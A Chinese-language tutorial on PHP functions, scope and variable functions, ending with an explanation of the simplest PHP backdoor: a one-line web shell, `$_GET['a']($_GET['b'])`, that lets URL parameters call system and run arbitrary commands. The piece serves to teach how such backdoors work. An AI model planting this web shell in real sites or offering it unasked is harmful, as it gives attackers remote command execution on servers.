PHP函数的定义与最简单后门原理

函数的定义

• 使用function关键字来定义一个函数
• 定义函数的函数名避开关键字
• 形式参数是传递映射的
• 实际参数是实际参与运算的
• 返回值是自定义函数运行完成后返回的值默认是空(NULL)

函数调用的过程

• 在调用函数时会在内存中开辟一段空间去执行函数

• 函数调用结束之后会回到调用的位置继续向下执行

变量的范围

• 局部变量

• 全局变量

• 超全局变量

局部变量

局部变量就是在函数内部定义的变量

除函数体内外部无法调用此变量

如果要想使用局部变量

• 传参
• 全局变量的声明

全局变量

全局变量无论在函数内部外部都可以被调用使用但是要在函数定义时使用global关键字去定义变量

可变函数

动态函数

可变函数也叫变量函数，动态函数，函数名可以动态设置和调用。

function test(){}$fun_name="test";
$fun_name();//这里就相当于test()调用了这个函数

直接把函数名赋值给变量，通过修改变量的值，可以实现动态调用。

function test(){}$fun_name=($_GET["fun_name"]);
$fu

PHP 最简单后门原理分析

通过定义动态函数来调用php内置函数

<pre>
<?php$fun_name = ($_GET['a']);var_dump( $_GET );$fun_name($_GET['b']);
?>

这是动态函数的创建然后我们看一下执行的数据我们去浏览器进行GET传参的形式访问

可以看到这是为_GET超全局变量数组创建了索引，并在url中对创建好的的下标索引进行赋值
通过这种方式一个下标接收调用php系统内置函数system另一个下标接收要执行的命令，并从而达到对系统的一个控制

经过分析从而得出结论

<?php
$_GET["a"]($_GET["b"]);
?>

通过黑客利用PHP动态函数和_GET传参的特性从而达到一个简单后门的部署